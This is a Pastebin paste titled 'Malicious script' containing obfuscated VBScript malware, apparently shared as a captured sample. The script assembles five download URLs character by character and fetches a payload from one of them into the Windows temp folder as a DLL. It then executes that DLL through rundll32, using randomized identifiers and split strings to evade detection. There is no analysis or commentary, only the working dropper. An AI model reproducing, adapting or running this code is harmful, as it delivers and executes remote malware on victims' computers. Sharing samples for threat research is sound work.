API tools faq
paste
Advertisement
dynamoo

Malicious script

dynamoo
Nov 7th, 2016
597
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VBScript 7.42 KB | None | 0 0
raw download clone embed print report
  1. On Error Resume Next
  2. Const Rv5h5i0k5p4 = 1, ECi1q9j5n6t2 = 2, Nl0r5e4i0g5 = 8
  3. Const Tf5d1h8l8w8 = 1, Jv0x6w7t6c3 = 2, QZf6c8u7l5f0 = "437", BXh8q2v4w5z5 = 2
  4. Function Bl4t5r0i1e9(Fv9e9y4c1g9)
  5. Dim Xt8o8f7y3d6, At9i4m5e3u5, Xw9n5b2r3s3
  6. Set Xt8o8f7y3d6 = CreateObject("ADO"&"DB.Stream")
  7. Xt8o8f7y3d6.type = Jv0x6w7t6c3
  8. Xt8o8f7y3d6.Charset = QZf6c8u7l5f0
  9. Xt8o8f7y3d6.Open
  10. Xt8o8f7y3d6.LoadFromFile Fv9e9y4c1g9
  11. Xw9n5b2r3s3 = Xt8o8f7y3d6.ReadText
  12. Xt8o8f7y3d6.Close
  13. Bl4t5r0i1e9 = RVu2q1z1c0a7(Xw9n5b2r3s3)
  14. End Function
  15. Sub Lh3s4l5l8e0(Fv9e9y4c1g9, Sk7x2y6a5a6)
  16. Dim Xt8o8f7y3d6, Xw9n5b2r3s3
  17. Set Xt8o8f7y3d6 = CreateObject("AD"&"ODB.Stream")
  18. Xt8o8f7y3d6.type = Jv0x6w7t6c3
  19. Xt8o8f7y3d6.Charset = QZf6c8u7l5f0
  20. Xt8o8f7y3d6.Open
  21. Xw9n5b2r3s3 = Mh3x8t2w7s4(Sk7x2y6a5a6)
  22. Xt8o8f7y3d6.WriteText Xw9n5b2r3s3
  23. Xt8o8f7y3d6.SaveToFile Fv9e9y4c1g9, BXh8q2v4w5z5
  24. Xt8o8f7y3d6.Close
  25. End Sub
  26. Function Gy2r4m8v9v6(Bn5k1c7z6z5)
  27. Dim Xw9n5b2r3s3, IKr9a2y0a5j9(0)
  28. If Bn5k1c7z6z5 <= 0 Then
  29. Err.Raise 50001, "", "qqqq", "", 0
  30. ElseIf Bn5k1c7z6z5 = 1 Then
  31. Gy2r4m8v9v6 = IKr9a2y0a5j9
  32. Else
  33. Xw9n5b2r3s3 = Space(Bn5k1c7z6z5-1)
  34. Gy2r4m8v9v6 = Split(Xw9n5b2r3s3, " ")
  35. End If
  36. End Function
  37. Function BCr1v0l5c8g5(Fk9j1v0p7l3)
  38. Dim Iz3v0l3j1a1, HUh0i1z9q7g4, At9i4m5e3u5, JWw7w5w3u6o8
  39. Dim YHp5y6z3v4q4, KUd3g8r1s6v2(1)
  40. Set Iz3v0l3j1a1 = CreateObject("Scrip"&"ting.FileSystemObject")
  41. KUd3g8r1s6v2(0) = "WinHttp.WinH"&"ttpRequest.5.1"
  42. KUd3g8r1s6v2(1) = "MSXML2.XML"&"HTTP"
  43. For Each YHp5y6z3v4q4 in KUd3g8r1s6v2
  44. Err.Clear
  45. Set HUh0i1z9q7g4 = CreateObject(YHp5y6z3v4q4)
  46. If Err.Number = 0 Then
  47. Exit For
  48. End If
  49. Next
  50. If 8=8 Then
  51. HUh0i1z9q7g4.Open "GE"&"T", Fk9j1v0p7l3, False
  52. End If
  53. HUh0i1z9q7g4.Send
  54. At9i4m5e3u5 = Gy2r4m8v9v6(LenB(HUh0i1z9q7g4.ResponseBody))
  55. For JWw7w5w3u6o8 = 1 To LenB(HUh0i1z9q7g4.ResponseBody)
  56. At9i4m5e3u5(JWw7w5w3u6o8-1) = AscB(MidB(HUh0i1z9q7g4.ResponseBody, JWw7w5w3u6o8, 1))
  57. Next
  58. BCr1v0l5c8g5 = At9i4m5e3u5
  59. End Function
  60. Sub Nz7k3t7g3a1( Cm7n0l9x9v5, FYc9e1v7b1e0 )
  61. Dim JWw7w5w3u6o8, IEi1c2a1a8u2, Iz3v0l3j1a1, HUh0i1z9q7g4, Kk0o3l9i3m1
  62. Set Iz3v0l3j1a1 = CreateObject( "Scrip"&"ting.FileSystemObject" )
  63. If Iz3v0l3j1a1.FolderExists( FYc9e1v7b1e0 ) Then
  64. Kk0o3l9i3m1 = Iz3v0l3j1a1.BuildPath( FYc9e1v7b1e0, Mid( Cm7n0l9x9v5, InStrRev( Cm7n0l9x9v5, "/" ) + 1 ) )
  65. ElseIf Iz3v0l3j1a1.FolderExists( Left( FYc9e1v7b1e0, InStrRev( FYc9e1v7b1e0, "\" ) - 1 ) ) Then
  66. Kk0o3l9i3m1 = FYc9e1v7b1e0
  67. Else
  68. Exit Sub
  69. End If
  70. Set IEi1c2a1a8u2 = Iz3v0l3j1a1.OpenTextFile( Kk0o3l9i3m1, ECi1q9j5n6t2, True )
  71. Set HUh0i1z9q7g4 = CreateObject( "WinHttp.WinHttp"&"Request.5.1" )
  72. HUh0i1z9q7g4.Open "G"&"ET", Cm7n0l9x9v5, False
  73. HUh0i1z9q7g4.Send
  74. If LenB(HUh0i1z9q7g4.ResponseBody) < 100000 Or LenB(HUh0i1z9q7g4.ResponseBody) > 250000 Then
  75. Err.Raise 50011, "", "qqqq", "", 0
  76. Exit Sub
  77. End If
  78. For JWw7w5w3u6o8 = 1 To LenB( HUh0i1z9q7g4.ResponseBody )
  79. IEi1c2a1a8u2.Write Chr( AscB( MidB( HUh0i1z9q7g4.ResponseBody, JWw7w5w3u6o8, 1 ) ) )
  80. Next
  81. If 8=8 Then
  82. IEi1c2a1a8u2.Close( )
  83. End If
  84. End Sub
  85. Function Pv0a8n6g5v4()
  86. Dim EZf5v6c8r2a8, Jd3q5u3r2z0, FMw4p1c2u1x5
  87. Set EZf5v6c8r2a8 = CreateObject(Chr(87)+Chr(83)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(83)+Chr(104)+Chr(101)+Chr(108)+Chr(108))
  88. If 8=8 Then
  89. Set Jd3q5u3r2z0 = EZf5v6c8r2a8.Environment("System")
  90. End If
  91. FMw4p1c2u1x5 = Jd3q5u3r2z0("PROCESSOR_"&"ARCHITECTURE")
  92. If LCase(FMw4p1c2u1x5) = Chr(97) & "md6"& Chr(34) Then
  93. Pv0a8n6g5v4 = EZf5v6c8r2a8.ExpandEnvironmentStrings("%SystemRoot%\Sy"&"sWOW64\rundll32.e"&"xe")
  94. Else
  95. Pv0a8n6g5v4 = EZf5v6c8r2a8.ExpandEnvironmentStrings("%SystemRoot"&"%\system32\rundll32.e"&"xe")
  96. End If
  97. End Function
  98. Sub Xd4l3m8o1v8(Vh9n6b5o9t6, LAi2q6i0o9v5, Eq1t0n9v2y8)
  99. Dim EZf5v6c8r2a8, Iz3v0l3j1a1, IEi1c2a1a8u2, WKw2a7v0n6q7, WXm6i4u5t3c8
  100. Set EZf5v6c8r2a8 = CreateObject("WScr"&"ipt"&".S"&"hell")
  101. Set Iz3v0l3j1a1 = CreateObject("Scrip"&"ting.FileSystemObject")
  102. Set IEi1c2a1a8u2 = Iz3v0l3j1a1.GetFile(Vh9n6b5o9t6)
  103. WKw2a7v0n6q7 = IEi1c2a1a8u2.ShortPath
  104. WXm6i4u5t3c8 = Pv0a8n6g5v4() + " " + WKw2a7v0n6q7 + "," + LAi2q6i0o9v5 + " " + Eq1t0n9v2y8
  105. If 8=8 Then
  106. EZf5v6c8r2a8.Run(WXm6i4u5t3c8)
  107. End If
  108. End Sub
  109. Function Ad4b1n4q7z5(Vh9n6b5o9t6)
  110. Dim Iz3v0l3j1a1
  111. Set Iz3v0l3j1a1 = CreateObject("Scrip"&"ting.FileSystemObject")
  112. Ad4b1n4q7z5 = Iz3v0l3j1a1.FileExists(Vh9n6b5o9t6)
  113. End Function
  114. Function Zx4v2w0r4u0(Vh9n6b5o9t6)
  115. Dim Iz3v0l3j1a1, IEi1c2a1a8u2
  116. Set Iz3v0l3j1a1 = CreateObject("Scrip"&"ting.FileSystemObject")
  117. Set IEi1c2a1a8u2 = Iz3v0l3j1a1.GetFile(Vh9n6b5o9t6)
  118. Zx4v2w0r4u0 = IEi1c2a1a8u2.ShortPath
  119. End Function
  120. Function Re8a1r0o6e1(Rq2b7l1n2y6, TZd1g6d1o3r2)
  121. Dim Bn5k1c7z6z5
  122. Bn5k1c7z6z5 = CDbl(Int(CDbl(Rq2b7l1n2y6)/CDbl(TZd1g6d1o3r2)))
  123. Re8a1r0o6e1 = CDbl(Rq2b7l1n2y6) - Bn5k1c7z6z5 * CDbl(TZd1g6d1o3r2)
  124. End Function
  125. Function Md2j7u6u1i0(Zz7v7s1x7d5, Xw9n5b2r3s3)
  126. Xw9n5b2r3s3(1) = 172 * Xw9n5b2r3s3(1) Mod 30307
  127. Xw9n5b2r3s3(0) = 171 * Xw9n5b2r3s3(0) Mod 30269
  128. Xw9n5b2r3s3(2) = 170 * Xw9n5b2r3s3(2) Mod 30323
  129. Dim Od5t0s3j9r6
  130. Od5t0s3j9r6 = Re8a1r0o6e1((CDbl(Xw9n5b2r3s3(0))/30269.0 + CDbl(Xw9n5b2r3s3(1))/30307.0 + CDbl(Xw9n5b2r3s3(2))/30323.0), 1.0)
  131. Md2j7u6u1i0 = Int(Od5t0s3j9r6 * CDbl(Zz7v7s1x7d5))
  132. End Function
  133. Function NHi6u0v5e9c1(SDs8s0h3q2t3)
  134. NHi6u0v5e9c1 = CInt(SDs8s0h3q2t3*Rnd())
  135. End Function
  136. Sub MRc3u4f8f1p5(Qe7z5e4c3o0)
  137. WScript.Sleep(Qe7z5e4c3o0)
  138. End Sub
  139. Sub TSa5t4w9r4j5(Nk9k2y9e6s1)
  140. WScript.Quit(Nk9k2y9e6s1)
  141. End Sub
  142. Randomize
  143. Dim DZe6j2w7j5r8(2), Qt5h4g3u5j2, ALo0k4j3l5o6(4), Fv9e9y4c1g9
  144. DZe6j2w7j5r8(0)=0+14413
  145. DZe6j2w7j5r8(1)=0+15337
  146. DZe6j2w7j5r8(2)=0+15163
  147. Qt5h4g3u5j2 = 1
  148. ALo0k4j3l5o6(0) = ""+"h"+Chr(116)+Chr(116)+"p:"+"/"+"/"+ "c" & chR(111) & "a" & chR(99) & "h" & "a" & "t" & "e" & "l" & "i" & "e" & "r" & chR(46) & "n" & "l" & "/" & "l" & "g" & "8" & "s" & "2"
  149.  
  150. ALo0k4j3l5o6(1) = ""+"h"+Chr(116)+Chr(116)+"p:"+"/"+"/"+ "b" & chR(101) & "c" & "h" & "s" & "a" & "u" & "t" & "o" & "m" & "o" & "b" & "i" & "l" & "e" & "r" & "." & chR(100) & "k" & chR(47) & "m" & chR(56) & "i" & "d" & "i" & "9" & "j"
  151.  
  152. ALo0k4j3l5o6(2) = ""+"h"+Chr(116)+Chr(116)+"p:"+"/"+"/"+ "d" & "e" & "s" & "e" & "r" & "t" & "k" & chR(105) & "n" & "g" & "w" & "a" & "t" & "e" & "r" & chR(112) & "r" & "o" & "o" & "f" & "i" & chR(110) & "g" & "." & chR(99) & "o" & "m" & "/" & "m" & "a" & "4" & "5" & "6" & "2"
  153.  
  154. ALo0k4j3l5o6(3) = ""+"h"+Chr(116)+Chr(116)+"p:"+"/"+"/"+ chR(122) & "a" & "p" & "a" & "s" & "h" & "y" & "d" & "r" & "o" & "." & "n" & "e" & "t" & "/" & "6" & chR(115) & "g" & chR(116) & "o" & "2" & "b" & "d"
  155.  
  156. ALo0k4j3l5o6(4) = ""+"h"+Chr(116)+Chr(116)+"p:"+"/"+"/"+ "o" & "w" & "k" & "c" & "o" & "n" & "." & "c" & "o" & "m" & "/" & "6" & "x" & "g" & "o" & "h" & "g" & "6" & "i"
  157.  
  158. Fv9e9y4c1g9 = "Z6uBMrbyqhs"
  159. Dim EZf5v6c8r2a8, IVr6o1p3r6l7, VKq6s6r7i0o2, LZe1c7b8o0k2, Qe7z5e4c3o0, HFt4k4c2m5r4
  160. Set objShell = CreateObject("WS"&"cript.S"&"hell")
  161. IVr6o1p3r6l7 = objShell.ExpandEnvironmentStrings("%" & "T"&"EM"&"P%")
  162. HFt4k4c2m5r4 = "txt"
  163. Dim Jz3j8p0i0l9, PZy6t5m4r1m5, STk3e6y8i6d0, Nw0q9o9m6w1, JWw7w5w3u6o8
  164. PZy6t5m4r1m5 = False
  165. For JWw7w5w3u6o8=0 To 5
  166. VKq6s6r7i0o2 = IVr6o1p3r6l7 & "\" + Fv9e9y4c1g9 + Chr(48+JWw7w5w3u6o8) + "."+"d"&"l"+"l"
  167. If Ad4b1n4q7z5(VKq6s6r7i0o2) Then
  168. LZe1c7b8o0k2 = Zx4v2w0r4u0(VKq6s6r7i0o2) & "." + HFt4k4c2m5r4
  169. If Ad4b1n4q7z5(LZe1c7b8o0k2) Then
  170. WScript.Quit(0)
  171. End If
  172. End If
  173. If Not PZy6t5m4r1m5 Then
  174. Jz3j8p0i0l9 = NHi6u0v5e9c1(UBound(ALo0k4j3l5o6))
  175. Nz7k3t7g3a1 ALo0k4j3l5o6(Jz3j8p0i0l9), VKq6s6r7i0o2
  176. If Err.Number <> 0 Then
  177. WScript.Quit(0)
  178. End If
  179. PZy6t5m4r1m5 = True
  180. End If
  181. Xd4l3m8o1v8 VKq6s6r7i0o2, "bb"&"b", "41"&"7"
  182. TSa5t4w9r4j5 1
  183. Next
  184. If 8=8 Then
  185. TSa5t4w9r4j5 0
  186. End If
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!